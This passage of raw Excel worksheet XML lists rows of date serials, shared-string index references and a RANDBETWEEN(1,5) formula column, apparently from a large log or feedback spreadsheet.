        <v>42943.791527777779</v>
      </c>
      <c r="C25697" t="s">
        <v>260</v>
      </c>
      <c r="F25697">
        <f t="shared" ca="1" si="401"/>
        <v>5</v>
      </c>
    </row>
    <row r="25698" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25698" s="1">
        <v>42943.759780092594</v>
      </c>
      <c r="C25698" t="s">
        <v>10</v>
      </c>
      <c r="D25698" t="s">
        <v>374</v>
      </c>
      <c r="E25698" t="s">
        <v>23336</v>
      </c>
      <c r="F25698">
        <f t="shared" ca="1" si="401"/>
        <v>2</v>
      </c>
    </row>
    <row r="25699" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25699" s="1">
        <v>42943.727083333331</v>
      </c>
      <c r="C25699" t="s">
        <v>10</v>
      </c>
      <c r="D25699" t="s">
        <v>6</v>
      </c>
      <c r="E25699" t="s">
        <v>23337</v>
      </c>
      <c r="F25699">
        <f t="shared" ca="1" si="401"/>
        <v>5</v>
      </c>
    </row>
    <row r="25700" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25700" s="1">
        <v>42943.720462962963</v>
      </c>
      <c r="C25700" t="s">
        <v>6</v>
      </c>
      <c r="D25700" t="s">
        <v>25</v>
      </c>
      <c r="E25700" t="s">
        <v>23338</v>
      </c>
      <c r="F25700">
        <f t="shared" ca="1" si="401"/>
        <v>2</v>
      </c>
    </row>
    <row r="25701" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25701" s="1">
        <v>42943.673981481479</v>
      </c>
      <c r="C25701" t="s">
        <v>10</v>
      </c>
      <c r="D25701" t="s">
        <v>80</v>
      </c>
      <c r="E25701" t="s">
        <v>23339</v>
      </c>
      <c r="F25701">
        <f t="shared" ca="1" si="401"/>
        <v>2</v>
      </c>
    </row>
    <row r="25702" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25702" s="1">
        <v>42943.656967592593</v>
      </c>
      <c r="C25702" t="s">
        <v>10</v>
      </c>
      <c r="D25702" t="s">
        <v>192</v>
      </c>
      <c r="E25702" s="2" t="s">
        <v>23340</v>
      </c>
      <c r="F25702">
        <f t="shared" ca="1" si="401"/>
        <v>1</v>
      </c>
    </row>
    <row r="25703" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25703" s="1">
        <v>42943.645856481482</v>
      </c>
      <c r="C25703" t="s">
        <v>10</v>
      </c>
      <c r="D25703" t="s">
        <v>6</v>
      </c>
      <c r="E25703" t="s">
        <v>23341</v>
      </c>
      <c r="F25703">
        <f t="shared" ca="1" si="401"/>
        <v>1</v>
      </c>
    </row>
    <row r="25704" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25704" s="1">
        <v>42943.645810185182</v>
      </c>
      <c r="C25704" t="s">
        <v>10</v>
      </c>
      <c r="D25704" t="s">
        <v>330</v>
      </c>
      <c r="E25704" t="s">
        <v>4998</v>
      </c>
      <c r="F25704">
        <f t="shared" ca="1" si="401"/>
        <v>4</v>
      </c>
    </row>
    <row r="25705" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25705" s="1">
        <v>42943.638564814813</v>
      </c>
      <c r="C25705" t="s">
        <v>10</v>
      </c>
      <c r="D25705" t="s">
        <v>86</v>
      </c>
      <c r="E25705" t="s">
        <v>23342</v>
      </c>
      <c r="F25705">
        <f t="shared" ca="1" si="401"/>
        <v>4</v>
      </c>
    </row>
    <row r="25706" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25706" s="1">
        <v>42943.611400462964</v>
      </c>
      <c r="C25706" t="s">
        <v>10</v>
      </c>
      <c r="D25706" t="s">
        <v>36</v>
      </c>
      <c r="E25706" t="s">
        <v>23343</v>
      </c>
      <c r="F25706">
        <f t="shared" ca="1" si="401"/>
        <v>3</v>
      </c>
    </row>
    <row r="25707" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25707" s="1">
        <v>42943.55128472222</v>
      </c>
      <c r="C25707" t="s">
        <v>6</v>
      </c>
      <c r="D25707" t="s">
        <v>194</v>
      </c>
      <c r="E25707" t="s">
        <v>23344</v>
      </c>
      <c r="F25707">
        <f t="shared" ca="1" si="401"/>
        <v>1</v>
      </c>
    </row>
    <row r="25708" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25708" s="1">
        <v>42943.485312500001</v>
      </c>
      <c r="C25708" t="s">
        <v>6</v>
      </c>
      <c r="D25708" t="s">
        <v>25</v>
      </c>
      <c r="E25708" s="2" t="s">
        <v>23345</v>
      </c>
      <c r="F25708">
        <f t="shared" ca="1" si="401"/>
        <v>2</v>
      </c>
    </row>
    <row r="25709" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25709" s="1">
        <v>42943.462789351855</v>
      </c>
      <c r="C25709" t="s">
        <v>41</v>
      </c>
      <c r="D25709" t="s">
        <v>312</v>
      </c>
      <c r="E25709" s="2" t="s">
        <v>23346</v>
      </c>
      <c r="F25709">
        <f t="shared" ca="1" si="401"/>
        <v>3</v>
      </c>
    </row>
    <row r="25710" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25710" s="1">
        <v>42943.461712962962</v>
      </c>
      <c r="C25710" t="s">
        <v>41</v>
      </c>
      <c r="D25710" t="s">
        <v>312</v>
      </c>
      <c r="E25710" s="2" t="s">
        <v>23346</v>
      </c>
      <c r="F25710">
        <f t="shared" ca="1" si="401"/>
        <v>5</v>
      </c>
    </row>
    <row r="25711" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25711" s="1">
        <v>42943.450370370374</v>
      </c>
      <c r="C25711" t="s">
        <v>10</v>
      </c>
      <c r="D25711" t="s">
        <v>17</v>
      </c>
      <c r="E25711" t="s">
        <v>23347</v>
      </c>
      <c r="F25711">
        <f t="shared" ca="1" si="401"/>
        <v>4</v>
      </c>
    </row>
    <row r="25712" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25712" s="1">
        <v>42943.43886574074</v>
      </c>
      <c r="C25712" t="s">
        <v>10</v>
      </c>
      <c r="D25712" t="s">
        <v>86</v>
      </c>
      <c r="E25712" t="s">
        <v>23348</v>
      </c>
      <c r="F25712">
        <f t="shared" ca="1" si="401"/>
        <v>2</v>
      </c>
    </row>
    <row r="25713" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A25713" s="1">
        <v>42943.395856481482</v>
      </c>
      <c r="C25713" t="s">
        <v>124</v>
      </c>
      <c r="E25713" s="2" t="s">
        <v>23349</v>
      </c>
      <c r="F25713">
        <f t="shared" ca="1" si="401"/>
        <v>1</v>
      </c>
    </row>
    <row r="25714" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25714" s="1">
        <v>42943.38890046296</v>
      </c>
      <c r="C25714" t="s">
        <v>10</v>
      </c>
      <c r="D25714" t="s">
        <v>290</v>
      </c>
      <c r="F25714">
        <f t="shared" ca="1" si="401"/>
        <v>2</v>
      </c>
    </row>
    <row r="25715" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25715" s="1">
        <v>42943.386018518519</v>
      </c>
      <c r="C25715" t="s">
        <v>1080</v>
      </c>
      <c r="E25715" s="2" t="s">
        <v>23350</v>
      </c>
      <c r="F25715">
        <f t="shared" ca="1" si="401"/>
        <v>3</v>
      </c>
    </row>
    <row r="25716" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25716" s="1">
        <v>42943.384479166663</v>
      </c>
      <c r="C25716" t="s">
        <v>10</v>
      </c>
      <c r="D25716" t="s">
        <v>41</v>
      </c>
      <c r="E25716" t="s">
        <v>23351</v>
      </c>
      <c r="F25716">
        <f t="shared" ca="1" si="401"/>
        <v>1</v>
      </c>
    </row>
    <row r="25717" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25717" s="1">
        <v>42943.384421296294</v>
      </c>
      <c r="C25717" t="s">
        <v>10</v>
      </c>
      <c r="D25717" t="s">
        <v>36</v>
      </c>
      <c r="E25717" t="s">
        <v>23352</v>
      </c>
      <c r="F25717">
        <f t="shared" ca="1" si="401"/>
        <v>4</v>
      </c>
    </row>
    <row r="25718" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25718" s="1">
        <v>42943.364212962966</v>
      </c>
      <c r="C25718" t="s">
        <v>41</v>
      </c>
      <c r="E25718" t="s">
        <v>23353</v>
      </c>
      <c r="F25718">
        <f t="shared" ca="1" si="401"/>
        <v>3</v>
      </c>
    </row>
    <row r="25719" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A25719" s="1">
        <v>42943.351585648146</v>
      </c>
      <c r="C25719" t="s">
        <v>16</v>
      </c>
      <c r="E25719" s="2" t="s">
        <v>23354</v>
      </c>
      <c r="F25719">
        <f t="shared" ca="1" si="401"/>
        <v>3</v>
      </c>
    </row>
    <row r="25720" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A25720" s="1">
        <v>42943.274224537039</v>
      </c>
      <c r="C25720" t="s">
        <v>10</v>
      </c>
      <c r="D25720" t="s">
        <v>107</v>
      </c>
      <c r="E25720" s="2" t="s">
        <v>23355</v>
      </c>
      <c r="F25720">
        <f t="shared" ca="1" si="401"/>
        <v>4</v>
      </c>
    </row>
    <row r="25721" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A25721" s="1">
        <v>42943.25068287037</v>
      </c>
      <c r="C25721" t="s">
        <v>48</v>
      </c>
      <c r="E25721" s="2" t="s">
        <v>23356</v>
      </c>
      <c r="F25721">
        <f t="shared" ca="1" si="401"/>
        <v>1</v>
      </c>
    </row>
    <row r="25722" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A25722" s="1">
        <v>42943.23773148148</v>
      </c>
      <c r="C25722" t="s">
        <v>124</v>
      </c>
      <c r="E25722" s="2" t="s">
        <v>23357</v>
      </c>
      <c r="F25722">
        <f t="shared" ca="1" si="401"/>
        <v>5</v>
      </c>
    </row>
    <row r="25723" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25723" s="1">
        <v>42943.223645833335</v>
      </c>
      <c r="C25723" t="s">
        <v>48</v>
      </c>
      <c r="E25723" s="2" t="s">
        <v>23358</v>
      </c>
      <c r="F25723">
        <f t="shared" ca="1" si="401"/>
        <v>1</v>
      </c>
    </row>
    <row r="25724" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A25724" s="1">
        <v>42943.216273148151</v>
      </c>
      <c r="C25724" t="s">
        <v>124</v>
      </c>
      <c r="E25724" s="2" t="s">
        <v>23359</v>
      </c>
      <c r="F25724">
        <f t="shared" ca="1" si="401"/>
        <v>4</v>
      </c>
    </row>
    <row r="25725" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25725" s="1">
        <v>42943.107731481483</v>
      </c>
      <c r="C25725" t="s">
        <v>71</v>
      </c>
      <c r="E25725" s="2" t="s">
        <v>23360</v>
      </c>
      <c r="F25725">
        <f t="shared" ca="1" si="401"/>
        <v>3</v>
      </c>
    </row>
    <row r="25726" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A25726" s="1">
        <v>42943.083182870374</v>
      </c>
      <c r="C25726" t="s">
        <v>10</v>
      </c>
      <c r="D25726" t="s">
        <v>11</v>
      </c>
      <c r="E25726" s="2" t="s">
        <v>23361</v>
      </c>
      <c r="F25726">
        <f t="shared" ca="1" si="401"/>
        <v>2</v>
      </c>
    </row>
    <row r="25727" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25727" s="1">
        <v>42943.063599537039</v>
      </c>
      <c r="C25727" t="s">
        <v>41</v>
      </c>
      <c r="E25727" t="s">
        <v>23362</v>
      </c>
      <c r="F25727">
        <f t="shared" ca="1" si="401"/>
        <v>5</v>
      </c>
    </row>
    <row r="25728" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25728" s="1">
        <v>42942.952673611115</v>
      </c>
      <c r="C25728" t="s">
        <v>253</v>
      </c>
      <c r="E25728" t="s">
        <v>23363</v>
      </c>
      <c r="F25728">
        <f t="shared" ca="1" si="401"/>
        <v>4</v>
      </c>
    </row>
    <row r="25729" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A25729" s="1">
        <v>42942.907546296294</v>
      </c>
      <c r="C25729" t="s">
        <v>260</v>
      </c>
      <c r="E25729" s="2" t="s">
        <v>23364</v>
      </c>
      <c r="F25729">
        <f t="shared" ca="1" si="401"/>
        <v>1</v>
      </c>
    </row>
    <row r="25730" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25730" s="1">
        <v>42942.89949074074</v>
      </c>
      <c r="C25730" t="s">
        <v>253</v>
      </c>
      <c r="E25730" t="s">
        <v>23365</v>
      </c>
      <c r="F25730">
        <f t="shared" ref="F25730:F25793" ca="1" si="402">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="25731" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A25731" s="1">
        <v>42942.875138888892</v>
      </c>
      <c r="C25731" t="s">
        <v>10</v>
      </c>
      <c r="D25731" t="s">
        <v>6</v>
      </c>
      <c r="E25731" s="2" t="s">
        <v>23366</v>
      </c>
      <c r="F25731">
        <f t="shared" ca="1" si="402"/>
        <v>4</v>
      </c>
    </row>
    <row r="25732" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25732" s="1">
        <v>42942.864907407406</v>
      </c>
      <c r="C25732" t="s">
        <v>73</v>
      </c>
      <c r="E25732" t="s">
        <v>23367</v>
      </c>
      <c r="F25732">
        <f t="shared" ca="1" si="402"/>
        <v>2</v>
      </c>
    </row>
    <row r="25733" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25733" s="1">
        <v>42942.850231481483</v>
      </c>
      <c r="C25733" t="s">
        <v>10</v>
      </c>
      <c r="D25733" t="s">
        <v>6</v>
      </c>
      <c r="E25733" t="s">
        <v>23368</v>
      </c>
      <c r="F25733">
        <f t="shared" ca="1" si="402"/>
        <v>1</v>
      </c>
    </row>
    <row r="25734" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A25734" s="1">
        <v>42942.848645833335</v>
      </c>
      <c r="C25734" t="s">
        <v>10</v>
      </c>
      <c r="D25734" t="s">
        <v>6</v>
      </c>
      <c r="E25734" s="2" t="s">
        <v>23369</v>
      </c>
      <c r="F25734">
        <f t="shared" ca="1" si="402"/>
        <v>1</v>
      </c>
    </row>
    <row r="25735" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25735" s="1">
        <v>42942.786909722221</v>
      </c>
      <c r="C25735" t="s">
        <v>10</v>
      </c>
      <c r="D25735" t="s">
        <v>46</v>
      </c>
      <c r="E25735" t="s">
        <v>23370</v>
      </c>
      <c r="F25735">
        <f t="shared" ca="1" si="402"/>
        <v>4</v>
      </c>
    </row>
    <row r="25736" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25736" s="1">
        <v>42942.765243055554</v>
      </c>
      <c r="C25736" t="s">
        <v>10</v>
      </c>
      <c r="D25736" t="s">
        <v>6</v>
      </c>
      <c r="E25736" t="s">
        <v>23371</v>
      </c>
      <c r="F25736">
        <f t="shared" ca="1" si="402"/>
        <v>4</v>
      </c>
    </row>
    <row r="25737" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25737" s="1">
        <v>42942.72148148148</v>
      </c>
      <c r="C25737" t="s">
        <v>10</v>
      </c>
      <c r="D25737" t="s">
        <v>151</v>
      </c>
      <c r="E25737" t="s">
        <v>23372</v>
      </c>
      <c r="F25737">
        <f t="shared" ca="1" si="402"/>
        <v>2</v>
      </c>
    </row>
    <row r="25738" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25738" s="1">
        <v>42942.677048611113</v>
      </c>
      <c r="C25738" t="s">
        <v>6</v>
      </c>
      <c r="D25738" t="s">
        <v>25</v>
      </c>
      <c r="E25738" t="s">
        <v>23373</v>
      </c>
      <c r="F25738">
        <f t="shared" ca="1" si="402"/>
        <v>4</v>
      </c>
    </row>
    <row r="25739" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25739" s="1">
        <v>42942.662256944444</v>
      </c>
      <c r="C25739" t="s">
        <v>6</v>
      </c>
      <c r="D25739" t="s">
        <v>25</v>
      </c>
      <c r="E25739" t="s">
        <v>23374</v>
      </c>
      <c r="F25739">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25740" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25740" s="1">
        <v>42942.65892361111</v>
      </c>
      <c r="C25740" t="s">
        <v>10</v>
      </c>
      <c r="D25740" t="s">
        <v>163</v>
      </c>
      <c r="E25740" t="s">
        <v>23375</v>
      </c>
      <c r="F25740">
        <f t="shared" ca="1" si="402"/>
        <v>1</v>
      </c>
    </row>
    <row r="25741" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A25741" s="1">
        <v>42942.658217592594</v>
      </c>
      <c r="C25741" t="s">
        <v>10</v>
      </c>
      <c r="D25741" t="s">
        <v>20</v>
      </c>
      <c r="E25741" s="2" t="s">
        <v>23376</v>
      </c>
      <c r="F25741">
        <f t="shared" ca="1" si="402"/>
        <v>1</v>
      </c>
    </row>
    <row r="25742" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25742" s="1">
        <v>42942.633125</v>
      </c>
      <c r="C25742" t="s">
        <v>10</v>
      </c>
      <c r="D25742" t="s">
        <v>494</v>
      </c>
      <c r="E25742" t="s">
        <v>23377</v>
      </c>
      <c r="F25742">
        <f t="shared" ca="1" si="402"/>
        <v>5</v>
      </c>
    </row>
    <row r="25743" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25743" s="1">
        <v>42942.62699074074</v>
      </c>
      <c r="C25743" t="s">
        <v>10</v>
      </c>
      <c r="D25743" t="s">
        <v>14</v>
      </c>
      <c r="E25743" t="s">
        <v>23378</v>
      </c>
      <c r="F25743">
        <f t="shared" ca="1" si="402"/>
        <v>2</v>
      </c>
    </row>
    <row r="25744" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A25744" s="1">
        <v>42942.600370370368</v>
      </c>
      <c r="C25744" t="s">
        <v>6</v>
      </c>
      <c r="D25744" t="s">
        <v>821</v>
      </c>
      <c r="E25744" s="2" t="s">
        <v>23379</v>
      </c>
      <c r="F25744">
        <f t="shared" ca="1" si="402"/>
        <v>2</v>
      </c>
    </row>
    <row r="25745" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25745" s="1">
        <v>42942.598136574074</v>
      </c>
      <c r="C25745" t="s">
        <v>10</v>
      </c>
      <c r="D25745" t="s">
        <v>86</v>
      </c>
      <c r="E25745" t="s">
        <v>23380</v>
      </c>
      <c r="F25745">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25746" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25746" s="1">
        <v>42942.593136574076</v>
      </c>
      <c r="C25746" t="s">
        <v>10</v>
      </c>
      <c r="D25746" t="s">
        <v>6</v>
      </c>
      <c r="E25746" t="s">
        <v>23381</v>
      </c>
      <c r="F25746">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25747" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25747" s="1">
        <v>42942.569803240738</v>
      </c>
      <c r="C25747" t="s">
        <v>10</v>
      </c>
      <c r="D25747" t="s">
        <v>158</v>
      </c>
      <c r="E25747" t="s">
        <v>23382</v>
      </c>
      <c r="F25747">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25748" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25748" s="1">
        <v>42942.54111111111</v>
      </c>
      <c r="C25748" t="s">
        <v>10</v>
      </c>
      <c r="D25748" t="s">
        <v>46</v>
      </c>
      <c r="E25748" t="s">
        <v>23383</v>
      </c>
      <c r="F25748">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25749" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25749" s="1">
        <v>42942.530381944445</v>
      </c>
      <c r="C25749" t="s">
        <v>10</v>
      </c>
      <c r="D25749" t="s">
        <v>151</v>
      </c>
      <c r="E25749" s="2" t="s">
        <v>23384</v>
      </c>
      <c r="F25749">
        <f t="shared" ca="1" si="402"/>
        <v>2</v>
      </c>
    </row>
    <row r="25750" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25750" s="1">
        <v>42942.512974537036</v>
      </c>
      <c r="C25750" t="s">
        <v>107</v>
      </c>
      <c r="E25750" t="s">
        <v>23385</v>
      </c>
      <c r="F25750">
        <f t="shared" ca="1" si="402"/>
        <v>4</v>
      </c>
    </row>
    <row r="25751" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25751" s="1">
        <v>42942.51189814815</v>
      </c>
      <c r="C25751" t="s">
        <v>10</v>
      </c>
      <c r="D25751" t="s">
        <v>52</v>
      </c>
      <c r="E25751" t="s">
        <v>23386</v>
      </c>
      <c r="F25751">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25752" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25752" s="1">
        <v>42942.511828703704</v>
      </c>
      <c r="C25752" t="s">
        <v>10</v>
      </c>
      <c r="D25752" t="s">
        <v>52</v>
      </c>
      <c r="E25752" t="s">
        <v>23386</v>
      </c>
      <c r="F25752">
        <f t="shared" ca="1" si="402"/>
        <v>5</v>
      </c>
    </row>
    <row r="25753" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25753" s="1">
        <v>42942.492743055554</v>
      </c>
      <c r="C25753" t="s">
        <v>260</v>
      </c>
      <c r="E25753" s="2" t="s">
        <v>23387</v>
      </c>
      <c r="F25753">
        <f t="shared" ca="1" si="402"/>
        <v>1</v>
      </c>
    </row>
    <row r="25754" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25754" s="1">
        <v>42942.487442129626</v>
      </c>
      <c r="C25754" t="s">
        <v>10</v>
      </c>
      <c r="D25754" t="s">
        <v>163</v>
      </c>
      <c r="E25754" s="2" t="s">
        <v>23388</v>
      </c>
      <c r="F25754">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25755" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25755" s="1">
        <v>42942.477210648147</v>
      </c>
      <c r="C25755" t="s">
        <v>10</v>
      </c>
      <c r="D25755" t="s">
        <v>494</v>
      </c>
      <c r="E25755" s="2" t="s">
        <v>23389</v>
      </c>
      <c r="F25755">
        <f t="shared" ca="1" si="402"/>
        <v>4</v>
      </c>
    </row>
    <row r="25756" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25756" s="1">
        <v>42942.440949074073</v>
      </c>
      <c r="C25756" t="s">
        <v>10</v>
      </c>
      <c r="D25756" t="s">
        <v>178</v>
      </c>
      <c r="E25756" t="s">
        <v>23390</v>
      </c>
      <c r="F25756">
        <f t="shared" ca="1" si="402"/>
        <v>5</v>
      </c>
    </row>
    <row r="25757" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25757" s="1">
        <v>42942.439143518517</v>
      </c>
      <c r="C25757" t="s">
        <v>10</v>
      </c>
      <c r="D25757" t="s">
        <v>89</v>
      </c>
      <c r="E25757" t="s">
        <v>23391</v>
      </c>
      <c r="F25757">
        <f t="shared" ca="1" si="402"/>
        <v>5</v>
      </c>
    </row>
    <row r="25758" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25758" s="1">
        <v>42942.402754629627</v>
      </c>
      <c r="C25758" t="s">
        <v>173</v>
      </c>
      <c r="E25758" t="s">
        <v>23392</v>
      </c>
      <c r="F25758">
        <f t="shared" ca="1" si="402"/>
        <v>1</v>
      </c>
    </row>
    <row r="25759" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25759" s="1">
        <v>42942.393414351849</v>
      </c>
      <c r="C25759" t="s">
        <v>10</v>
      </c>
      <c r="D25759" t="s">
        <v>17</v>
      </c>
      <c r="E25759" t="s">
        <v>23393</v>
      </c>
      <c r="F25759">
        <f t="shared" ca="1" si="402"/>
        <v>5</v>
      </c>
    </row>
    <row r="25760" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25760" s="1">
        <v>42942.389548611114</v>
      </c>
      <c r="C25760" t="s">
        <v>107</v>
      </c>
      <c r="E25760" s="2" t="s">
        <v>23394</v>
      </c>
      <c r="F25760">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25761" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25761" s="1">
        <v>42942.387233796297</v>
      </c>
      <c r="C25761" t="s">
        <v>48</v>
      </c>
      <c r="E25761" t="s">
        <v>23395</v>
      </c>
      <c r="F25761">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25762" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A25762" s="1">
        <v>42942.364305555559</v>
      </c>
      <c r="C25762" t="s">
        <v>65</v>
      </c>
      <c r="E25762" s="2" t="s">
        <v>23396</v>
      </c>
      <c r="F25762">
        <f t="shared" ca="1" si="402"/>
        <v>1</v>
      </c>
    </row>
    <row r="25763" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25763" s="1">
        <v>42942.362222222226</v>
      </c>
      <c r="C25763" t="s">
        <v>16</v>
      </c>
      <c r="F25763">
        <f t="shared" ca="1" si="402"/>
        <v>5</v>
      </c>
    </row>
    <row r="25764" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25764" s="1">
        <v>42942.350300925929</v>
      </c>
      <c r="C25764" t="s">
        <v>10</v>
      </c>
      <c r="D25764" t="s">
        <v>244</v>
      </c>
      <c r="E25764" s="2" t="s">
        <v>23397</v>
      </c>
      <c r="F25764">
        <f t="shared" ca="1" si="402"/>
        <v>4</v>
      </c>
    </row>
    <row r="25765" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A25765" s="1">
        <v>42942.336377314816</v>
      </c>
      <c r="C25765" t="s">
        <v>10</v>
      </c>
      <c r="D25765" t="s">
        <v>6</v>
      </c>
      <c r="E25765" s="2" t="s">
        <v>23398</v>
      </c>
      <c r="F25765">
        <f t="shared" ca="1" si="402"/>
        <v>1</v>
      </c>
    </row>
    <row r="25766" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A25766" s="1">
        <v>42942.336354166669</v>
      </c>
      <c r="C25766" t="s">
        <v>10</v>
      </c>
      <c r="D25766" t="s">
        <v>6</v>
      </c>
      <c r="E25766" s="2" t="s">
        <v>23398</v>
      </c>
      <c r="F25766">
        <f t="shared" ca="1" si="402"/>
        <v>4</v>
      </c>
    </row>
    <row r="25767" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25767" s="1">
        <v>42942.321863425925</v>
      </c>
      <c r="C25767" t="s">
        <v>6</v>
      </c>
      <c r="D25767" t="s">
        <v>194</v>
      </c>
      <c r="E25767" t="s">
        <v>23399</v>
      </c>
      <c r="F25767">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25768" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25768" s="1">
        <v>42942.251504629632</v>
      </c>
      <c r="C25768" t="s">
        <v>41</v>
      </c>
      <c r="E25768" s="2" t="s">
        <v>23400</v>
      </c>
      <c r="F25768">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25769" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25769" s="1">
        <v>42942.251481481479</v>
      </c>
      <c r="C25769" t="s">
        <v>41</v>
      </c>
      <c r="E25769" s="2" t="s">
        <v>23400</v>
      </c>
      <c r="F25769">
        <f t="shared" ca="1" si="402"/>
        <v>2</v>
      </c>
    </row>
    <row r="25770" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25770" s="1">
        <v>42942.246215277781</v>
      </c>
      <c r="C25770" t="s">
        <v>731</v>
      </c>
      <c r="E25770" s="2" t="s">
        <v>23401</v>
      </c>
      <c r="F25770">
        <f t="shared" ca="1" si="402"/>
        <v>2</v>
      </c>
    </row>
    <row r="25771" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25771" s="1">
        <v>42942.201932870368</v>
      </c>
      <c r="C25771" t="s">
        <v>686</v>
      </c>
      <c r="E25771" s="2" t="s">
        <v>23402</v>
      </c>
      <c r="F25771">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25772" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25772" s="1">
        <v>42942.199004629627</v>
      </c>
      <c r="C25772" t="s">
        <v>41</v>
      </c>
      <c r="E25772" t="s">
        <v>23403</v>
      </c>
      <c r="F25772">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25773" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25773" s="1">
        <v>42942.169618055559</v>
      </c>
      <c r="C25773" t="s">
        <v>17</v>
      </c>
      <c r="F25773">
        <f t="shared" ca="1" si="402"/>
        <v>1</v>
      </c>
    </row>
    <row r="25774" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25774" s="1">
        <v>42942.151099537034</v>
      </c>
      <c r="C25774" t="s">
        <v>197</v>
      </c>
      <c r="E25774" t="s">
        <v>23404</v>
      </c>
      <c r="F25774">
        <f t="shared" ca="1" si="402"/>
        <v>5</v>
      </c>
    </row>
    <row r="25775" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25775" s="1">
        <v>42942.109236111108</v>
      </c>
      <c r="C25775" t="s">
        <v>10</v>
      </c>
      <c r="D25775" t="s">
        <v>271</v>
      </c>
      <c r="F25775">
